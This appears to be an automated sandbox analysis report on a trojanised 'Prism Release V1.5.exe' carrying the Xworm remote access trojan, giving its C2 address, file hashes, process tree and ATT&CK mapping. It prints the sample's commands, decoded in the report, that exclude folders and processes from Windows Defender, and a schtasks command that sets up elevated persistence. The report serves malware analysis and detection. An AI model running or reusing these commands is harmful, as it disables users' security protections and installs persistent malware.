Analysis

  • max time kernel: 147s
  • max time network: 150s
  • platform: windows7_x64
  • resource: win7-20240611-en
  • resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted: 15-06-2024 08:44

General

  • Target: Prism Release V1.5.exe
  • Size: 5.1MB
  • MD5: ac80f970a7ae1c07663abdd11d752d34
  • SHA1: 5ee4c0de86dc91aebb47f3ea6b7e624e861fdfad
  • SHA256: b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001
  • SHA512: 7bd6150976477bec27532e7d7449e8a1ee6997b41359f3b31e2da8db0602f1ac0dfae171d8ebe00a0e18c2c77c7f9e4ed18352f7d8cf76c1cff855166ed6f94b
  • SSDEEP: 98304:crjAG8empOd+SyaREAaOeaD5lWsjvi+ffzwZZHUzItLqbn82rh:3ppcNJQkjvi+ffzwZZJiR1

Malware Config

Extracted

  • Family: xworm
  • C2: 91.92.241.69:5555
  • Attributes
    • Install_directory: %ProgramData%
    • install_file: Windows Runtime.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe
    "C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="
      The -EncodedCommand value is UTF-16LE base64 and decodes to (the <#...#> fragments are block comments used as padding): <#ztm#>Add-Type -AssemblyName System.Windows.Forms;<#qzg#>[System.Windows.Forms.MessageBox]::Show('.gg/getprism - Run As Admin If Injection Fails','','OK','Information')<#usd#>
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1768
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="
      The -EncodedCommand value decodes to: <#ftv#>Add-MpPreference <#fqu#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#vup#> -Force <#fwa#> (a Windows Defender exclusion covering the entire user profile and the system drive).
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2428
    • C:\Users\Admin\dllhost.exe
      "C:\Users\Admin\dllhost.exe"
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:740
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1612
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
        • Creates scheduled task(s)
        PID:1748
      • C:\Users\Admin\AppData\Local\Temp\zohdbc.exe
        "C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe
          "C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"
          • Executes dropped EXE
          • Loads dropped DLL
          PID:820
    • C:\Users\Admin\Prism Executor.exe
      "C:\Users\Admin\Prism Executor.exe"
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe
        "C:\Users\Admin\Prism Executor.exe"
        • Executes dropped EXE
        • Loads dropped DLL
        PID:332
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    PID:1140
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {564574B8-2846-46D1-A3B6-9AA79E6F5D1E} S-1-5-21-1340930862-1405011213-2821322012-1000:TICCAUTD\Admin:Interactive:[1]
    PID:1272

Network

MITRE ATT&CK Matrix ATT&CK v13

  • Execution
    • Command and Scripting Interpreter (T1059): 1
    • PowerShell (T1059.001): 1
    • Scheduled Task/Job (T1053): 1
  • Persistence
    • Boot or Logon Autostart Execution (T1547): 1
    • Registry Run Keys / Startup Folder (T1547.001): 1
    • Scheduled Task/Job (T1053): 1
  • Privilege Escalation
    • Boot or Logon Autostart Execution (T1547): 1
    • Registry Run Keys / Startup Folder (T1547.001): 1
    • Scheduled Task/Job (T1053): 1
  • Defense Evasion
    • Modify Registry (T1112): 1
  • Discovery
    • System Information Discovery (T1082): 1
    • Query Registry (T1012): 1


Downloads

  • C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\python310.dll
    Filesize: 4.2MB
    MD5: 384349987b60775d6fc3a6d202c3e1bd
    SHA1: 701cb80c55f859ad4a31c53aa744a00d61e467e5
    SHA256: f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
    SHA512: 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: 7a9d1c19cacd312219e8b3f263b6e98d
    SHA1: 4b5eec3c52faa2ba8e8ff52444fe8b37675f6750
    SHA256: 8858d129f3fe4908517468c7f7e0dba6229d3474df036d53da3f1032765660ad
    SHA512: b89d523b9ee18c764dd3ca4d4f52897315f46d2384a2548f82352dc1a4c4f2e0eeace7451e337c89a21079ead7144e601d16c7546dddae557c018aa907ff2e06

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize: 7KB
    MD5: 6cc5f2687f2a665534a9c9d2c2c5d571
    SHA1: 57e8376734a36ec45383c559d8e01a2b5be0bec7
    SHA256: b8bea798f9af6c4e33c329cfbba6836289399112c155de53c69448e442430a70
    SHA512: ff47f6dba9fe13b36590b0ab0659f13d4f131c9c2060bbc20718ac8323f917a788f5f8eb7e0f23374452f4a1446f82afc5dff2935ef9e88879d08a40e837964f

  • \Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe
    Filesize: 38.4MB
    MD5: 473d542fefe26be37736dc09341747bf
    SHA1: 359cadaafa2f5c032cc300a9097467de701a816c
    SHA256: f88890e37c4d16601fad17152fea87947f4098ac3903f138250fa3482bd3bafc
    SHA512: 01c08a86156b2bc3745c62bea2a787b9635a71a61595b0ddccec976e39fc50ec1547daa15aa301f4109a6bbf99b772f1d427b14a581c5dcfc1a0651e4c79fb16

  • \Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe
    Filesize: 3.5MB
    MD5: 58545dc488990ac11872079d119f8284
    SHA1: dade5c16834d582a5187041697cc5a7c2eae2f88
    SHA256: 6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc
    SHA512: 93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

  • \Users\Admin\AppData\Local\Temp\zohdbc.exe
    Filesize: 32.9MB
    MD5: 32004d8a59efe46298e06798a1a96cb9
    SHA1: da3c34b6d7d4f692e673e45dacc825b3ef17a2ed
    SHA256: 03ca5525ec9b76e0d61787679977fff9ed515e7c9d30100ba7d8499a8b62a47f
    SHA512: 34c25e4b7ec2f61c6df8da73a720a91ec01762b06be8b12308876711e6a3b44f2633b27a38f2c516ff0925cb5829b70e993167e989ceb9a328d7422f7ab41495

  • \Users\Admin\Prism Executor.exe
    Filesize: 5.0MB
    MD5: fa819e23d8fee4ea89aaaea55e0b28f5
    SHA1: 18335d4e0d140dcab66c7197c57f669251898ce5
    SHA256: bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c
    SHA512: e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

  • \Users\Admin\dllhost.exe
    Filesize: 78KB
    MD5: 4a7f75343aaa5a4d8d18add50ccf3139
    SHA1: 110c62eee6d7deb4aa9d601c942eae43482d2125
    SHA256: 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e
    SHA512: 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

  • memory/1784-954-0x000000001B730000-0x000000001BA12000-memory.dmp
    Filesize: 2.9MB

  • memory/1784-955-0x00000000020C0000-0x00000000020C8000-memory.dmp
    Filesize: 32KB

  • memory/2720-18-0x00000000011A0000-0x00000000011BA000-memory.dmp
    Filesize: 104KB